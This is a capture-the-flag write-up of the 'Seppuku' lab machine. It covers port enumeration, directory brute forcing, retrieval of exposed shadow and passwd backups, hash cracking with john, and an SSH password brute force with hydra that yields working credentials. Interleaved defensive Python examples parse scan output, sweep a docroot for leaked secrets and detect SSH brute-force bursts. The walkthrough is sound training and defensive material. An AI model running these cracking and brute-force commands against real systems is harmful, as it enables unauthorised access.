Pwned Date - 6th July 2022

Enumeration

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http          nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
|_http-server-header: LiteSpeed
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_http-title: Did not follow redirect to https://192.168.125.90:7080/
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http          LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m06s, deviation: 2h18m37s, median: 4s
| smb2-time: 
|   date: 2022-07-03T13:45:29
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2022-07-03T09:45:33-04:00

Tried smbclient and anonymous FTP login, but no luck.

Port 80 prompts for a login (HTTP Basic auth). Port 7080 is TLS, and the browser has a problem with it and won't load the page. Then we see there is another port open at 7601, which is running Apache.
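Since this writeup records an offensive exercise, the added examples take the defender's side. The following triage helper is an added example, not part of the original writeup: it parses the nmap port table and NSE script blocks above (re-embedded as a constructed excerpt) and flags what a blue team would want to fix: cleartext FTP, HTTP Basic auth over plain HTTP, SMB signing disabled and a guest session answered, and a TLS certificate near expiry judged against the pwned date (the certificate above has 36 days left on 6 July 2022). The `parse_scan`/`find_issues` names and the 60-day expiry threshold are my own assumptions.

```python
"""Triage nmap -sV/-sC output for defender-relevant findings.
Added example, not part of the original writeup; function names and the
60-day certificate warning threshold are assumptions."""
import re
from datetime import datetime

# Constructed excerpt of the scan shown above (raw string so "\x0D" stays literal).
SAMPLE_SCAN = r"""
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http          nginx 1.14.2
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
445/tcp  open  netbios-ssn   Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
NOT_AFTER_RE = re.compile(r"Not valid after:\s*(\S+)")


def parse_scan(text):
    """Group the port table and NSE script lines by port; host scripts go under 'host'."""
    sections = {}
    current = None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            current = int(m.group(1))
            sections[current] = {"service": m.group(4), "version": m.group(5).strip(), "script": []}
        elif raw.startswith("Host script results"):
            current = "host"
            sections[current] = {"service": "host", "version": "", "script": []}
        elif raw.startswith("|") and current is not None:
            # Strip the "| " / "|_  " tree prefix nmap puts in front of script output.
            sections[current]["script"].append(raw.lstrip("|_ ").rstrip())
    return sections


def find_issues(text, assessment_date, expiry_warn_days=60):
    """Return human-readable findings; assessment_date is an ISO date such as '2022-07-06'."""
    today = datetime.fromisoformat(assessment_date)
    issues = []
    for key, info in parse_scan(text).items():
        script = "\n".join(info["script"])
        if info["service"] == "ftp":
            issues.append(f"{key}: cleartext FTP ({info['version']}) exposed")
        if info["service"] == "http" and "Basic realm" in script:
            issues.append(f"{key}: HTTP Basic auth offered over plain HTTP (credentials base64-encoded, not encrypted)")
        if "message_signing: disabled" in script:
            issues.append(f"{key}: SMB message signing disabled")
        if "account_used: guest" in script:
            issues.append(f"{key}: SMB answered a guest session")
        m = NOT_AFTER_RE.search(script)
        if m:
            days_left = (datetime.fromisoformat(m.group(1)) - today).days
            if days_left < 0:
                issues.append(f"{key}: TLS certificate expired {-days_left} days ago")
            elif days_left <= expiry_warn_days:
                issues.append(f"{key}: TLS certificate expires in {days_left} days")
    return issues


if __name__ == "__main__":
    for line in find_issues(SAMPLE_SCAN, "2022-07-06"):
        print(line)
```

Feed it a real `nmap -sV -sC` text file and the date of the assessment; port 22 produces nothing here, which is the point of the checks being specific rather than "open port equals finding".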


We ran a directory brute force with gobuster on port 7601:

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.81.90:7601 -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php,txt
Error: error on parsing arguments: url scheme not specified

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u http://192.168.81.90:7601 -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php,txt
/.htpasswd            (Status: 403) [Size: 280]
/.hta.txt             (Status: 403) [Size: 280]
/.htaccess.txt        (Status: 403) [Size: 280]
/.htpasswd.txt        (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/a                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/a/]
/.htaccess            (Status: 403) [Size: 280]
/b                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/b/]
/c                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/c/]
/ckeditor             (Status: 301) [Size: 324] [--> http://192.168.81.90:7601/ckeditor/]
/database             (Status: 301) [Size: 324] [--> http://192.168.81.90:7601/database/]
/d                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/d/]
/e                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/e/]
/f                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/f/]
/h                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/h/]
/index.html           (Status: 200) [Size: 171]
/keys                 (Status: 301) [Size: 320] [--> http://192.168.81.90:7601/keys/]
/q                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/q/]
/r                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/r/]
/production           (Status: 301) [Size: 326] [--> http://192.168.81.90:7601/production/]
/server-status        (Status: 403) [Size: 280]
/secret               (Status: 301) [Size: 322] [--> http://192.168.81.90:7601/secret/]
/t                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/t/]
/w                    (Status: 301) [Size: 317] [--> http://192.168.81.90:7601/w/]

There is some spicy stuff on /secret


Also on /w


And lastly on /keys


Finally, after downloading all that rubbish, this is the final trashcan I collected:

┌──(kali㉿VirtualBox)-[~/seppuku]
└─$ ll
total 80K
-rw-r--r-- 1 kali kali  59K Sep 12  2018 jack.jpg
-rw-r--r-- 1 kali kali 2.8K May 13  2020 passwd.bak
-rw-r--r-- 1 kali kali  672 May 13  2020 password.lst
-rw-r--r-- 1 kali kali 1.7K May 13  2020 private
-rw-r--r-- 1 kali kali 1.7K May 13  2020 private.bak
-rw-r--r-- 1 kali kali 1.5K May 13  2020 shadow.bak
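Every file in that listing is something a pre-deployment check of the document root would have caught. The sweep below is an added example, not part of the writeup: it walks a docroot and reports files whose name (shadow, passwd, password list, private key) or content (a PEM private-key header, /etc/shadow-style hash fields, a root passwd entry) marks them as credential material. The `build_fixture` helper creates a throwaway directory with constructed stand-ins for the files above (fake key, fake hash); the patterns and helper names are my own assumptions.

```python
"""Pre-deployment sweep of a web document root for credential material.
Added example, not part of the writeup; the name/content patterns and the
sweep()/build_fixture() helpers are assumptions of this example."""
import os
import re
import shutil
import tempfile

# File names that should never sit in a docroot (the loot above fits these).
SUSPICIOUS_NAME = re.compile(
    r"(^|/)(shadow|passwd|passwords?|private|id_(rsa|dsa|ecdsa|ed25519))(\.bak|\.lst|\.old|~)?$",
    re.IGNORECASE,
)
# Content signatures, checked on the first max_bytes of every file.
CONTENT_SIGNATURES = {
    "private key": re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "shadow-style hash": re.compile(rb"^[^:\n]+:\$(1|2[aby]?|5|6|y)\$[^:\n]*:", re.MULTILINE),
    "passwd entry": re.compile(rb"^root:x?:0:0:", re.MULTILINE),
}


def sweep(docroot, max_bytes=1 << 20):
    """Return sorted (relative_path, [reasons]) for every file that looks like leaked credentials."""
    findings = []
    for dirpath, _, files in os.walk(docroot):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, docroot).replace(os.sep, "/")
            reasons = []
            if SUSPICIOUS_NAME.search(rel):
                reasons.append("suspicious file name")
            try:
                with open(path, "rb") as fh:
                    head = fh.read(max_bytes)
            except OSError:
                continue
            reasons += [label for label, sig in CONTENT_SIGNATURES.items() if sig.search(head)]
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings)


def build_fixture():
    """Create a throwaway docroot that mimics the layout found on port 7601 (constructed data)."""
    root = tempfile.mkdtemp(prefix="docroot_")
    layout = {
        "index.html": b"<html><body>Seppuku</body></html>\n",
        "jack.jpg": b"\xff\xd8\xff\xe0 constructed, not a real image\n",
        "keys/private": b"-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructed\n-----END RSA PRIVATE KEY-----\n",
        "secret/shadow.bak": b"root:$6$constsalt$constructedhash:18395:0:99999:7:::\n",
        "secret/password.lst": b"constructed1\nconstructed2\n",
    }
    for rel, body in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_fixture()
    try:
        for rel, reasons in sweep(root):
            print(f"{rel}: {', '.join(reasons)}")
    finally:
        shutil.rmtree(root)
```

Name and content checks are kept separate on purpose: `jack.jpg` passes both, `password.lst` is caught by name only, and a key renamed to something innocuous would still be caught by its PEM header.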

Exploitation

First, we crack the hashes in shadow.bak with john, using the provided password.lst as the wordlist:

┌──(kali㉿VirtualBox)-[~/seppuku]
└─$ john --wordlist=password.lst shadow.bak

a1b2c3           (r@bbit-hole)

Then we try to log in over SSH as r@bbit-hole with that password, but it does not work.

Then, using the hostname seppuku as the username, we brute-force SSH with the same wordlist:

┌──(kali㉿VirtualBox)-[~/seppuku]
└─$ hydra -l seppuku -P password.lst ssh://192.168.81.90 -t 64

[22][ssh] host: 192.168.81.90   login: seppuku   password: eeyoree
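The hydra run above leaves a very recognisable trace on the target: a burst of `Failed password` entries from one source address in sshd's log, followed by an `Accepted password` from the same address. The detector below is an added example, not part of the writeup: it parses syslog-format sshd lines, raises an alert per source IP once `threshold` failures land inside a sliding `window_seconds`, and records whether a successful login from that IP followed. The log lines, the attacker address 192.168.81.50 and the threshold/window defaults are constructed assumptions of this example.

```python
"""Detect SSH password-guessing bursts in sshd syslog lines.
Added example, not part of the writeup; the log lines, the source address
192.168.81.50 and the threshold/window defaults are constructed assumptions."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: normal activity, then a hydra-style burst against 'seppuku'
# that ends in a successful password login from the same source.
SAMPLE_AUTH_LOG = """\
Jul  6 10:02:11 seppuku sshd[1201]: Accepted publickey for admin from 10.0.0.5 port 51000 ssh2: RSA SHA256:constructed
Jul  6 10:15:01 seppuku sshd[1300]: Failed password for seppuku from 192.168.81.50 port 40001 ssh2
Jul  6 10:15:01 seppuku sshd[1301]: Failed password for seppuku from 192.168.81.50 port 40002 ssh2
Jul  6 10:15:01 seppuku sshd[1302]: Failed password for seppuku from 192.168.81.50 port 40003 ssh2
Jul  6 10:15:02 seppuku sshd[1303]: Failed password for seppuku from 192.168.81.50 port 40004 ssh2
Jul  6 10:15:02 seppuku sshd[1304]: Failed password for seppuku from 192.168.81.50 port 40005 ssh2
Jul  6 10:15:02 seppuku sshd[1305]: Failed password for seppuku from 192.168.81.50 port 40006 ssh2
Jul  6 10:15:02 seppuku sshd[1306]: Failed password for seppuku from 192.168.81.50 port 40007 ssh2
Jul  6 10:15:03 seppuku sshd[1307]: Failed password for seppuku from 192.168.81.50 port 40008 ssh2
Jul  6 10:15:03 seppuku sshd[1308]: Failed password for seppuku from 192.168.81.50 port 40009 ssh2
Jul  6 10:15:03 seppuku sshd[1309]: Failed password for seppuku from 192.168.81.50 port 40010 ssh2
Jul  6 10:15:03 seppuku sshd[1310]: Accepted password for seppuku from 192.168.81.50 port 40011 ssh2
Jul  6 10:31:45 seppuku sshd[1400]: Failed password for alice from 10.0.0.7 port 52222 ssh2
Jul  6 10:31:52 seppuku sshd[1401]: Accepted password for alice from 10.0.0.7 port 52223 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line):
    """Return a dict for an Accepted/Failed sshd line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # Syslog timestamps carry no year; that is fine for gaps inside one log.
    ev["ts"] = datetime.strptime(re.sub(r"\s+", " ", ev["ts"]), "%b %d %H:%M:%S")
    return ev


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Alert per source IP once it logs `threshold` failures within `window_seconds`,
    then keep counting and note a later Accepted login from that IP (the hydra outcome)."""
    attempts = defaultdict(list)   # ip -> [(ts, user)] failures still inside the window
    alerts = {}
    for ev in filter(None, map(parse_line, lines)):
        ip = ev["ip"]
        if ev["result"] == "Failed":
            recent = [(t, u) for t, u in attempts[ip]
                      if (ev["ts"] - t).total_seconds() <= window_seconds]
            recent.append((ev["ts"], ev["user"]))
            attempts[ip] = recent
            if ip in alerts:
                alerts[ip]["failures"] += 1
                alerts[ip]["users"].add(ev["user"])
            elif len(recent) >= threshold:
                alerts[ip] = {"ip": ip, "first_seen": recent[0][0], "failures": len(recent),
                              "users": {u for _, u in recent}, "success_as": None}
        elif ip in alerts and alerts[ip]["success_as"] is None:
            alerts[ip]["success_as"] = ev["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        outcome = f"then logged in as {a['success_as']}" if a["success_as"] else "no success seen"
        print(f"{a['ip']}: {a['failures']} failures against {sorted(a['users'])}, {outcome}")
```

The single mistyped password from 10.0.0.7 never reaches the threshold, so only the burst source is reported; an alert whose `success_as` is set is the one to treat as a compromised account rather than mere noise.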